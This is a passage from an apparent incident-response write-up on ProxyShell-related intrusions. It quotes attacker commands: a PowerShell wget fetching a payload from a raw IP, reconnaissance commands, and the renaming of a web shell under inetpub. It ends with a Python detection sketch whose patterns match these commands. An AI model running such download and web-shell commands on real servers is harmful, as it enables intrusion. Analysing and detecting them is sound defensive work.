Analyzing ProxyShell-related Incidents via Trend Micro Managed XDR

Both servers are using Liferay CE version 6.2, which is vulnerable to CVE-2020-7961 (possibly leading to remote code execution).

Incident #2

Similar to the first incident, the malicious actor accessed the server via a web shell and then started gathering basic information on the system. In the second incident, however, PowerShell was used for different post-exploitation activities.

Our analysis shows that a Wget request was sent to a URL on a high-numbered port. Unfortunately, we don't know what was downloaded, since the URL was already dead by the time of analysis.

"C:\Windows\System32\cmd.exe" /c powershell wget http://209.14.0[.]234:56138/iMCRufG79yXvYjH0W1SK

The following commands were executed in order to gather basic system information:

cmd.exe /c ipconfig
cmd.exe /c dir
"c:\windows\system32\cmd.exe" /c ping -n 1
"c:\windows\system32\cmd.exe" /c whoami

The web shell was then copied and the original entry deleted using the following commands:

cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\errorFF.aspx.req errorFF.aspx
"c:\windows\system32\cmd.exe" /c del
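A triage sketch for the command lines quoted above, as an added example that is not part of the original article or of Trend Micro's detection logic: it classifies `cmd.exe /c` process command lines as recon, a download from a raw IP on a high port, or web shell staging under inetpub, and flags hosts where recon appears together with either of the other two. The rule names, the 10000 port threshold and the sample events (host names, documentation IP, file names) are assumptions constructed for illustration.

```python
import re

# Patterns modelled on the command lines quoted in this write-up.
# Rule names and the port threshold are assumptions made for this example.
HIGH_PORT = 10000
CMD_C = re.compile(r'^"?(?:[a-z]:\\windows\\system32\\)?cmd(?:\.exe)?"?\s+/c\s+(.*)$', re.I)
RECON = re.compile(r'^(ipconfig|whoami|dir|ping)\b', re.I)
DOWNLOAD = re.compile(
    r'\b(?:wget|curl|iwr|invoke-webrequest)\b.*?https?://(\d{1,3}(?:\.\d{1,3}){3}):(\d+)', re.I)
STAGE = re.compile(
    r'^(?:ren|rename|move|copy)\s+(\S*\\inetpub\\wwwroot\\\S+)\s+(\S+\.as[hmp]x)\s*$', re.I)


def classify(cmdline):
    """Return a rule name for one process command line, or None."""
    m = CMD_C.match(cmdline.strip())
    if not m:
        return None
    inner = m.group(1).strip()
    if STAGE.match(inner):  # file under wwwroot renamed/copied to a script extension
        return "webshell_staging"
    d = DOWNLOAD.search(inner)
    if d and int(d.group(2)) >= HIGH_PORT:  # raw IP, no hostname, unusual port
        return "download_raw_ip_high_port"
    return "recon" if RECON.match(inner) else None


def triage(events):
    """events: iterable of (host, cmdline) pairs. Return {host: sorted rule names}
    for hosts that show recon together with staging or a download."""
    seen = {}
    for host, cmdline in events:
        rule = classify(cmdline)
        if rule:
            seen.setdefault(host, set()).add(rule)
    return {h: sorted(r) for h, r in seen.items() if "recon" in r and len(r) > 1}


# Constructed sample events (hosts, IP and file names are made up).
SAMPLE = [
    ("EXCH01", r'"C:\Windows\System32\cmd.exe" /c powershell wget http://203.0.113.7:56138/abc'),
    ("EXCH01", r'cmd.exe /c ipconfig'),
    ("EXCH01", r'"c:\windows\system32\cmd.exe" /c whoami'),
    ("EXCH01", r'cmd.exe /c ren C:\inetpub\wwwroot\aspnet_client\err.aspx.req err.aspx'),
    ("FILE02", r'cmd.exe /c ipconfig'),
    ("FILE02", r'cmd.exe /c ren C:\temp\a.txt b.txt'),
]
```

Recon commands alone are common administrator activity, which is why `triage` reports a host only when they coincide with one of the other two rules.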
